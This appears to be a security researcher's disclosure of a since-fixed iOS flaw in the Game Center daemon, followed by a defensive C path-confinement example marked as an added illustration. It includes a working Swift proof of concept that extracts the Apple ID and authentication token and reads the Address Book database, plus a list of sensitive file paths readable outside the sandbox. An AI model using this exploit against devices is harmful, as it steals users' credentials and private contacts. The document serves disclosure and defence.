iOS gamed exploit (fixed in 15.0.2)

Overview

Update: Apple has quietly fixed this in iOS 15.0.2 without any kind of public acknowledgement or credit.

Any app installed from the App Store may access the following data without any prompt to the user:

  • Apple ID email and the full name associated with it
  • Apple ID authentication token, which allows access to at least one of the endpoints on *.apple.com on behalf of the user
  • Complete file system read access to the Core Duet database (a list of contacts from Mail, SMS, iMessage and 3rd-party messaging apps, metadata about all of the user's interaction with these contacts, including timestamps and statistics, and some attachments such as URLs and texts)
  • Complete file system read access to the Speed Dial database and the Address Book database, including contact pictures and other metadata like creation and modification dates (I've just checked on iOS 15 and this one is inaccessible, so that must have been quietly fixed)

Here is a short proof of concept (Swift). GKDaemonProtocol and the service proxies it hands back are private Game Center interfaces, so the caller has to declare them before this compiles; the reply block's other positional parameters are ignored here.

import Foundation

// Standard NSXPC setup: attach the daemon protocol and resume the connection.
// The bug is in what gamed returns without checking the caller's entitlements.
let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)!
connection.remoteObjectInterface = NSXPCInterface(with: GKDaemonProtocol.self)
connection.resume()
let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
let pid = ProcessInfo.processInfo.processIdentifier

proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in
    // Apple ID and Game Center auth token, returned without any user prompt.
    accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
        let appleID = response.credential.accountName
        let token = response.credential.authenticationToken
        print("Apple ID: \(appleID), token: \(token)")
    })

    // The file URL is never confined to the image cache, so any readable path works.
    utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
        let addressBookData = data
        print("AddressBook.sqlitedb: \(addressBookData)")
    })
})

How it happens:

  • The XPC service com.apple.gamed does not properly check the caller for the com.apple.developer.game-center entitlement.
  • Even if Game Center is disabled on the device, invoking getServicesForPID:localPlayer:reply: returns several XPC proxy objects (GKAccountService, GKFriendService, GKUtilityService, etc.).
  • If Game Center is enabled on the device (even if it is not enabled for the app in App Store Connect and the app does not carry the com.apple.developer.game-center entitlement), invoking authenticatePlayerWithExistingCredentialsWithHandler: on GKAccountService returns an object containing the user's Apple ID, DSID and Game Center authentication token (which allows sending requests to https://gc.apple.com on behalf of the user). Invoking getProfilesForPlayerIDs:handler: on GKProfileService returns an object containing the first and last name of the user's Apple ID. Invoking getFriendsForPlayer:handler: on GKFriendService returns an object with information about the user's Game Center friends.
  • Even if Game Center is disabled, not enabled for the app in App Store Connect and the app does not carry the com.apple.developer.game-center entitlement, invoking requestImageDataForURL:subdirectory:fileName:handler: on GKUtilityService allows reading arbitrary files outside the app sandbox by passing file URLs to that method. Files that can be accessed this way include (but are not limited to):
      • /var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist - the MobileGestalt cache
      • /var/mobile/Library/CoreDuet/People/interactionC.db - a list of contacts from Mail, SMS, iMessage and 3rd-party messaging apps, plus metadata about the user's interaction with these contacts (including timestamps and statistics)
      • /var/mobile/Library/Preferences/com.apple.mobilephone.speeddial.plist - favorite contacts and their phone numbers
      • /var/mobile/Library/AddressBook/AddressBook.sqlitedb - the complete Address Book database
      • /var/mobile/Library/AddressBook/AddressBookImages.sqlitedb - photos of Address Book contacts
  • Invoking cacheImageData:inSubdirectory:withFileName:handler: on GKUtilityService might allow writing arbitrary data to a location outside the app sandbox.
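The file-read primitive above exists because the daemon opens whatever file URL the caller supplies. The following is an added example in C of the confinement check a service like that needs; it is not Apple's code (gamed's implementation is not public), and the function names (confine_path, serve_file, make_fixture, demo_read, run_demo) and the temp-directory layout are constructed for the demo. It canonicalises the requested path with realpath(), so ".." and symlink escapes and look-alike sibling directories are all refused, and only then opens the canonical path.

```c
/* Added example in C, not Apple's code: the confinement check that
 * requestImageDataForURL:subdirectory:fileName:handler: was missing. A daemon
 * that opens a caller-supplied path on the caller's behalf must canonicalise it
 * and refuse anything resolving outside the directory it serves; otherwise a
 * file:// URL reads whatever the daemon itself can open. Names and the
 * directory layout below are constructed for the demo. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Canonicalise `requested` (symlinks and ".." resolved) and accept it only if
 * it lies inside `root`; on success the canonical path is copied to `out`.
 * Both must exist: realpath() fails otherwise, and a missing file cannot be
 * served anyway. */
int confine_path(const char *root, const char *requested, char *out, size_t cap)
{
    char root_real[PATH_MAX], req_real[PATH_MAX];
    if (realpath(root, root_real) == NULL || realpath(requested, req_real) == NULL)
        return 0;
    /* A root of "/" confines nothing; any other root must match up to a
     * separator, so "/x/cache" does not admit "/x/cache-evil/file". */
    size_t n = strcmp(root_real, "/") == 0 ? 0 : strlen(root_real);
    if (strncmp(root_real, req_real, n) != 0) return 0;
    if (req_real[n] != '/' && req_real[n] != '\0') return 0;
    if (strlen(req_real) >= cap) return 0;
    strcpy(out, req_real);
    return 1;
}

/* Read on the caller's behalf only after confinement; returns bytes read or -1
 * if refused. The canonical path is what gets opened, not the caller's string.
 * The realpath()/open() window is still a race against a hostile filesystem,
 * one more reason the entitlement check on the connection matters as well. */
long serve_file(const char *root, const char *requested, char *buf, size_t cap)
{
    char canon[PATH_MAX];
    if (!confine_path(root, requested, canon, sizeof canon)) return -1;
    int fd = open(canon, O_RDONLY);
    if (fd < 0) return -1;
    long n = (long)read(fd, buf, cap);
    close(fd);
    return n;
}

static void write_file(const char *path, const char *content)
{
    FILE *f = fopen(path, "w");
    if (f) { fputs(content, f); fclose(f); }
}

/* Constructed fixture in a fresh temp dir: cache/ok.png (served),
 * outside/secret.db (must stay unreadable), cache/escape -> ../outside/secret.db
 * (symlink escape), cache-evil/x (sibling sharing the prefix).
 * Returns the base directory (caller frees) or NULL. */
char *make_fixture(void)
{
    char base[] = "/tmp/gamed-demo-XXXXXX", p[PATH_MAX];
    if (mkdtemp(base) == NULL) return NULL;
    snprintf(p, sizeof p, "%s/cache", base);             mkdir(p, 0700);
    snprintf(p, sizeof p, "%s/outside", base);           mkdir(p, 0700);
    snprintf(p, sizeof p, "%s/cache-evil", base);        mkdir(p, 0700);
    snprintf(p, sizeof p, "%s/cache/ok.png", base);      write_file(p, "PNG");
    snprintf(p, sizeof p, "%s/outside/secret.db", base); write_file(p, "SECRET");
    snprintf(p, sizeof p, "%s/cache-evil/x", base);      write_file(p, "x");
    snprintf(p, sizeof p, "%s/cache/escape", base);
    if (symlink("../outside/secret.db", p) != 0) return NULL;
    return strdup(base);
}

/* Request <base>/<rel> with <base>/cache as the served root. */
long demo_read(const char *base, const char *rel)
{
    char root[PATH_MAX], req[PATH_MAX], buf[64];
    snprintf(root, sizeof root, "%s/cache", base);
    snprintf(req, sizeof req, "%s/%s", base, rel);
    return serve_file(root, req, buf, sizeof buf);
}

/* Run the probes; returns how many were decided as expected (5 when correct). */
int run_demo(void)
{
    static const char *probe[] = { "cache/ok.png", "cache/../outside/secret.db",
                                   "cache/escape", "cache-evil/x", "cache/missing.png" };
    static const long expect[] = { 3, -1, -1, -1, -1 };
    char *base = make_fixture();
    if (base == NULL) return -1;
    int ok = 0;
    for (size_t i = 0; i < 5; i++) {
        long got = demo_read(base, probe[i]);
        printf("%-30s -> %ld\n", probe[i], got);
        ok += (got == expect[i]);
    }
    free(base);
    return ok;
}

int main(void) { return run_demo() == 5 ? 0 : 1; }
```

Only cache/ok.png is served (3 bytes); the "..", symlink, sibling-prefix and missing-file probes are all refused. The path check is necessary but not sufficient on its own: the first bullet above (no entitlement check on the connection) means the daemon should also refuse the request before ever looking at the path.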

On the Apple Security Bounty Program page this vulnerability is evaluated at $100,000 (Broad app access to sensitive data normally protected by a TCC prompt or the platform sandbox. "Sensitive data" access includes gaining broad access (i.e., the full database) from Contacts).
